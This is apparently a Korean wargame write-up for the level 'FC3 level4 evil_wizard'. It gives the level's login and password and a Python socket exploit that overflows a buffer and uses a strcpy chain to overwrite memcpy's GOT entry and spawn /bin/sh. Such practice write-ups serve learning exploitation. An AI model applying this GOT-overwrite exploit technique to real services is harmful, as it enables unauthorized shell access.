[FC3]level4 evil_wizard

ID:evil_wizard

PW:get down like that

이전 문제에서 로컬->리모트로 바뀌였다. 따라서 심볼릭링크를 못쓴다. 

필요한걸 구해보자

NULL: 0x8049814

payload는 아래와 같다.

"A"*268+"strcpy+ppr+"memcpy_got1+c0+strcpy+ppr+memcpy_got2+07+strcpy+ppr+memcpy_got3+75+strcpy+ppr+memcpy_got4+NULL+

memcpy+AAAA+&(/binsh)

import socket
import struct
p = lambda x : struct.pack("<L",x)
 
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('localhost',8888))
 
strcpy = p(0x8048438)
memcpy = p(0x8048418)
memcpy_got1 = p(0x8049850)
memcpy_got2 = p(0x8049851)
memcpy_got3 = p(0x8049852)
memcpy_got4 = p(0x8049853)
ppr = p(0x80484f3)
Null = p(0x8049814)
system1 = p(0x80484d0)
system2 = p(0x804817c)
system3 = p(0x80486bf)
binsh = p(0x00833603)
payload = ""
payload += "A"*268
payload += strcpy + ppr + memcpy_got1 + system1
payload += strcpy + ppr + memcpy_got2 + system2
payload += strcpy + ppr + memcpy_got3 + system3
payload += strcpy + ppr + memcpy_got4 + Null
payload += memcpy + "A"*4 + binsh
 
 
 
 
data=s.recv(10000)
print data
s.send(payload+'\n')
print payload
s.send("my-pass"+'\n')
data=s.recv(1024)
print data
s.close()
 
 

exploit

이번에는 그래도 좀 빨리 풀었다.(1시간 정도..) 만약 파이썬 소켓가지고 어리버리했으면 오래걸렸을꺼다..